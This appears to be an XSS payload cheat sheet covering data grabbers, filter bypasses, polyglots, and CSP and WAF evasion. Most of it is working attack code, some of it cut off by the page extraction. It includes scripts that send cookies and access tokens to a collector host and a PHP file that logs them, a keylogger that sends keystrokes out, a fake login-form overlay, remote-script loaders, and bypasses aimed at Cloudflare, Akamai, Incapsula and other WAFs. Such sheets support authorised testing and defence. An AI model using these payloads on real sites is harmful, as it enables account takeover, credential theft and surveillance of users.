XSS - Cross Site Scripting

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications. XSS enables attackers to inject client-side scripts into web pages viewed by other users.


  • Exploit code or POC

    • Data grabber for XSS

    • UI redressing

    • Javascript keylogger

    • Other ways

  • Identify an XSS endpoint

  • XSS in HTML/Applications

    • Common Payloads

    • XSS using HTML5 tags

    • XSS using a remote JS

    • XSS in hidden input

    • DOM based XSS

    • XSS in JS Context

  • XSS in wrappers javascript and data URI

  • XSS in files (XML/SVG/CSS/Flash/Markdown)

  • XSS in PostMessage

  • Blind XSS

    • XSS Hunter

    • Other Blind XSS tools

    • Blind XSS endpoint

  • Mutated XSS

  • Polyglot XSS

  • Filter Bypass and Exotic payloads

    • Bypass case sensitive

    • Bypass tag blacklist

    • Bypass word blacklist with code evaluation

    • Bypass with incomplete html tag

    • Bypass quotes for string

    • Bypass quotes in script tag

    • Bypass quotes in mousedown event

    • Bypass dot filter

    • Bypass parenthesis for string

    • Bypass parenthesis and semi colon

    • Bypass onxxxx= blacklist

    • Bypass space filter

    • Bypass email filter

    • Bypass document blacklist

    • Bypass using javascript inside a string

    • Bypass using an alternate way to redirect

    • Bypass using an alternate way to execute an alert

    • Bypass ">" using nothing

    • Bypass "<" and ">" using < and >

    • Bypass ";" using another character

    • Bypass using HTML encoding

    • Bypass using Katana

    • Bypass using Cuneiform

    • Bypass using Lontara

    • Bypass using ECMAScript6

    • Bypass using Octal encoding

    • Bypass using Unicode

    • Bypass using UTF-7

    • Bypass using UTF-8

    • Bypass using UTF-16be

    • Bypass using UTF-32

    • Bypass using BOM

    • Bypass using weird encoding or native interpretation

    • Bypass using jsfuck

  • CSP Bypass

  • Common WAF Bypass

Exploit code or POC

Data grabber for XSS

Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

<script>new Image().src="http://localhost/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://localhost/cookie.php?c="+localStorage.getItem('access_token');</script>

Write the collected data into a file.

$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");


  fetch('https://<SESSION>.burpcollaborator.net', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie

UI redressing

Leverage the XSS to modify the HTML content of the page in order to display a fake login form.

history.replaceState(null, null, '../../../login');
document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"

Javascript keylogger

Another way to collect sensitive data is to set a javascript keylogger.

<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>

Other ways

More exploits at http://www.xss-payloads.com/payloads-list.html?a#category=all:

Identify an XSS endpoint

This payload opens the debugger in the developper console rather than triggering a popup alert box.


Modern applications with content hosting can use sandbox domains

to safely host various types of user-generated content. Many of these sandboxes are specifically meant to isolate user-uploaded HTML, JavaScript, or Flash applets and make sure that they can't access any user data.

For this reason, it's better to use alert(document.domain) or alert(window.origin) rather than alert(1) as default XSS payload in order to know in which scope the XSS is actually executing.

Better payload replacing <script>alert(1)</script>:


While alert() is nice for reflected XSS it can quickly become a burden for stored XSS because it requires to close the popup for each execution, so console.log() can be used instead to display a message in the console of the developper console (doesn't require any interaction).


<script>console.log("Test XSS from the search bar of page XYZ\n".concat(document.domain).concat("\n").concat(window.origin))</script>



Most tools are also suitable for blind XSS attacks:

  • XSSStrike: Very popular but unfortunately not very well maintained

  • xsser: Utilizes a headless browser to detect XSS vulnerabilities

  • Dalfox: Extensive functionality and extremely fast thanks to the implementation in Go

  • XSpear: Similar to Dalfox but based on Ruby

  • domdig: Headless Chrome XSS Tester

XSS in HTML/Applications

Common Payloads

// Basic payload
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

// Svg payload
<svgonload=alert(1)>
<svg onload=alert(1)//
<svg id=alert(1) onload=eval(id)>
<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script)

// Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>

XSS using HTML5 tags

<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>

<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
<body ontouchend=alert(1)>   // Triggers when a finger is removed from touch screen
<body ontouchmove=alert(1)>  // When a finger is dragged across the screen.

XSS using a remote JS

<script src=14.rs>
// you can also specify an arbitrary payload with 14.rs/#payload
e.g: 14.rs/#alert(document.domain)

XSS in hidden input

<input type="hidden" accesskey="X" onclick="alert(1)">
Use CTRL+SHIFT+X to trigger the onclick event

XSS when payload is reflected capitalized

<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>

DOM based XSS

Based on a DOM XSS sink.

#"><img src=/ onerror=alert(2)>

XSS in JS Context

; alert(1);//
// (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)

XSS in wrappers javascript and data URI

XSS with javascript:




We can encode the "javascript:" in Hex/Octal

We can use a 'newline character'
java%0ascript:alert(1)   - LF (\n)
java%09script:alert(1)   - Horizontal tab (\t)
java%0dscript:alert(1)   - CR (\r)

Using the escape character

Using the newline and a comment //

XSS with data:

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

XSS with vbscript: only IE


XSS in files

** NOTE:** The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.



<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>


<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">

XSS in SVG (short)

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>


XSS in Markdown

[a](j a v a s c r i p t:prompt(document.cookie))

XSS in SWF flash application

Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1);

more payloads in ./files

XSS in SWF flash application

ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf


<!DOCTYPE html>
div  {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;

XSS in PostMessage

If the target origin is asterisk * the message can be sent to any domain has reference to the child page.

    <input type=button value="Click Me" id="btn">

document.getElementById('btn').onclick = function(e){
    window.poc = window.open('http://www.redacted.com/#login');
                "sender": "accounts",
                "url": "javascript:confirm('XSS')",
    }, 2000);

Blind XSS

XSS Hunter

Available at https://xsshunter.com/app

XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service.

"><script src=//yoursubdomain.xss.ht></script>

javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')

<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//yoursubdomain.xss.ht");a.send();</script>


Other Blind XSS tools

Blind XSS endpoint

  • Contact forms

  • Ticket support

  • Referer Header

    • Custom Site Analytics

    • Administrative Panel logs

  • User Agent

    • Custom Site Analytics

    • Administrative Panel logs

  • Comment Box

    • Administrative Panel


You can use a Data grabber for XSS and a one-line HTTP server to confirm the existence of a blind XSS before deploying a heavy blind-XSS testing tool.

Eg. payload


Eg. one-line HTTP server:

$ ruby -run -ehttpd . -p8080

Mutated XSS

Use browsers quirks to recreate some HTML tags when it is inside an element.innerHTML.

Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Polyglot XSS

Polyglot XSS - 0xsobky

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Polyglot XSS - Ashar Javed

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

Polyglot XSS - Mathias Karlsson

" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

Polyglot XSS - Rsnake

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

Polyglot XSS - Daniel Miessler

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http://i.imgur.com/P8mL8.jpg">
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>

Polyglot XSS - from @filedescriptor's Polyglot Challenge

# by crlf
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>

# by europa
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/-->&lt;svg/onload=/*<html/*/onmouseover=alert()//>

# by EdOverflow
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>-->&lt;svg onload=/*<html/*/onmouseover=alert()//>

# by h1/ragnar
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template>&lt;svg/onload='/*--><html */ onmouseover=alert()//'>`

Filter Bypass and exotic payloads

Bypass case sensitive


Bypass tag blacklist

<script x>
<script x>alert('XSS')<script y>

Bypass word blacklist with code evaluation

new Function`al\ert\`6\``;

Bypass with incomplete html tag

Works on IE/Firefox/Chrome/Safari

<img src='1' onerror='alert(0)' <

Bypass quotes for string


Bypass quotes in script tag

    <?php echo 'foo="text '.$_GET['test'].'";';`?>

Bypass quotes in mousedown event

You can bypass a single quote with ' in an on mousedown event handler

<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>

Bypass dot filter


Convert IP address into decimal format: IE. == http://3232235777 http://www.geektools.com/cgi-bin/ipconv.cgi


Base64 encoding your XSS payload with Linux command: IE. echo -n "alert(document.cookie)" | base64 == YWxlcnQoZG9jdW1lbnQuY29va2llKQ==

Bypass parenthesis for string


Bypass parenthesis and semi colon

// From @garethheyes
<script>onerror=alert;throw 1337</script>
<script>{onerror=alert}throw 1337</script>
<script>throw onerror=alert,'some string',123,'haha'</script>

// From @terjanq

// From @cgvwzq
<script>TypeError.prototype.name ='=/',0[onerror=eval]['/-alert(1)//']</script>

Bypass onxxxx= blacklist

<object onafterscriptexecute=confirm(0)>
<object onbeforescriptexecute=confirm(0)>

// Bypass onxxx= filter with a null byte/vertical tab
<img src='1' onerror\x00=alert(0) />
<img src='1' onerror\x0b=alert(0) />

// Bypass onxxx= filter with a '/'
<img src='1' onerror/=alert(0) />

Bypass space filter

// Bypass space filter with "/"

// Bypass space filter with 0x0c/^L
<svgonload=alert(1)>

$ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
00000000: 3c73 7667 0c6f 6e6c 6f61 640c 3d0c 616c  <svg.onload.=.al
00000010: 6572 7428 3129 0c3e 0a                   ert(1).>.

Bypass email filter

(RFC compliant)


Bypass document blacklist

<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>

Bypass using javascript inside a string

foo="text </script><script>alert(1)</script>";

Bypass using an alternate way to redirect

document.location = "http://google.com"

Bypass using an alternate way to execute an alert

From @brutelogic tweet.



From @theMiddle - Using global variables

The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its index number instead the function name.

c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
// 5

Then calling alert is :

// "alert"
self[Object.keys(self)[5]]("1") // alert("1")

We can find "alert" with a regular expression like ^a[rel]+t$ :

a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()

// then you can use a() with Object.keys

self[Object.keys(self)[a()]]("1") // alert("1")


a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")

From @quanyang tweet.


From @404death tweet.

new Function`al\ert\`6\``;





Bypass using an alternate way to trigger an alert

var i = document.createElement("iframe");
i.onload = function(){

// Bypassed security
XSSObject.proxy = function (obj, name, report_function_name, exec_original) {
      var proxy = obj[name];
      obj[name] = function () {
        if (exec_original) {
          return proxy.apply(this, arguments);
      XSSObject.lockdown(obj, name);
XSSObject.proxy(window, 'alert', 'window.alert', false);

Bypass ">" using nothing

You don't need to close your tags.

<svg onload=alert(1)//

Bypass "<" and ">" using < and >

Unicode Character U+FF1C and U+FF1E


Bypass ";" using another character

'te' * alert('*') * 'xt';
'te' / alert('/') / 'xt';
'te' % alert('%') % 'xt';
'te' - alert('-') - 'xt';
'te' + alert('+') + 'xt';
'te' ^ alert('^') ^ 'xt';
'te' > alert('>') > 'xt';
'te' < alert('<') < 'xt';
'te' == alert('==') == 'xt';
'te' & alert('&') & 'xt';
'te' , alert(',') , 'xt';
'te' | alert('|') | 'xt';
'te' ? alert('ifelsesh') : 'xt';
'te' in alert('in') in 'xt';
'te' instanceof alert('instanceof') instanceof 'xt';

Bypass using HTML encoding

></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>

Bypass using Katana

Using the Katakana library.


Bypass using Cuneiform


Bypass using Lontara


More alphabets on http://aem1k.com/aurebesh.js/#

Bypass using ECMAScript6


Bypass using Octal encoding


Bypass using Unicode

Unicode character U+FF1C FULLWIDTH LESS­THAN SIGN (encoded as %EF%BC%9C) was
transformed into U+003C LESS­THAN SIGN (<)

Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")

Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')

E.g : http://www.example.net/something%CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert%28/XSS/%29%EF%BC%9E/
%EF%BC%9E becomes >
%EF%BC%9C becomes <

Bypass using Unicode converted to uppercase

İ (%c4%b0).toLowerCase() => i
ı (%c4%b1).toUpperCase() => I
ſ (%c5%bf) .toUpperCase() => S
K (%E2%84%AA).toLowerCase() => k

<ſvg onload=... > become <SVG ONLOAD=...>
<ıframe id=x onload=>.toUpperCase() become <IFRAME ID=X ONLOAD=>

Bypass using UTF-7

+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Bypass using UTF-8

< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
' = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
" = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
" = %CA%BA
' = %CA%B9

Bypass using UTF-16be


Bypass using UTF-32


Bypass using BOM

Byte Order Mark (The page must begin with the BOM character.) BOM character allows you to override charset of the page

BOM Character for UTF-16 Encoding:
Big Endian : 0xFE 0xFF
Little Endian : 0xFF 0xFE
XSS : %fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E

BOM Character for UTF-32 Encoding:
Big Endian : 0x00 0x00 0xFE 0xFF
Little Endian : 0xFF 0xFE 0x00 0x00
XSS : %00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

Bypass using weird encoding or native interpretation

<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>

Bypass using jsfuck

Bypass using jsfuck


CSP Bypass

Check the CSP on https://csp-evaluator.withgoogle.com and the post : How to use Google’s CSP Evaluator to bypass CSP

Bypass CSP using JSONP from Google (Trick by @apfeifer27)



More JSONP endpoints:

Bypass CSP by lab.wallarm.com

Works for CSP like Content-Security-Policy: default-src 'self' 'unsafe-inline';, POC here


Bypass CSP by Rhynorater

// CSP Bypass with Inline and Eval

Bypass CSP by @akita_zen

Works for CSP like script-src self

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

Bypass CSP by @404death

Works for CSP like script-src 'self' data: as warned about in the official mozilla documentation.

<script src="data:,alert(1)">/</script>

Common WAF Bypass

Cloudflare XSS Bypasses by @Bohdan Korzhynskyi

25st January 2021

<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>

21st April 2020


22nd August 2019


5th June 2019


3rd June 2019

<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)


Cloudflare XSS Bypass - 27th February 2018

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>

Chrome Auditor - 9th August 2018


Live example by @brutelogic - https://brutelogic.com.br/xss.php

Incapsula WAF Bypass by @Alra3ees- 8th March 2018



Incapsula WAF Bypass by @c0d3G33k - 11th September 2018

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

Incapsula WAF Bypass by @daveysec - 11th May 2019

<svg onload\r\n=$.globalEval("al"+"ert()");>

Akamai WAF Bypass by @zseano - 18th June 2018


Akamai WAF Bypass by @s0md3v - 28th October 2018

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

WordFence WAF Bypass by @brutelogic - 12th September 2018

<a href=javas&#99;ript:alert(1)>

Fortiweb WAF Bypass by @rezaduty - 9th July 2019

\u003e\u003c\u0068\u0031 onclick=alert('1')\u003e


Last updated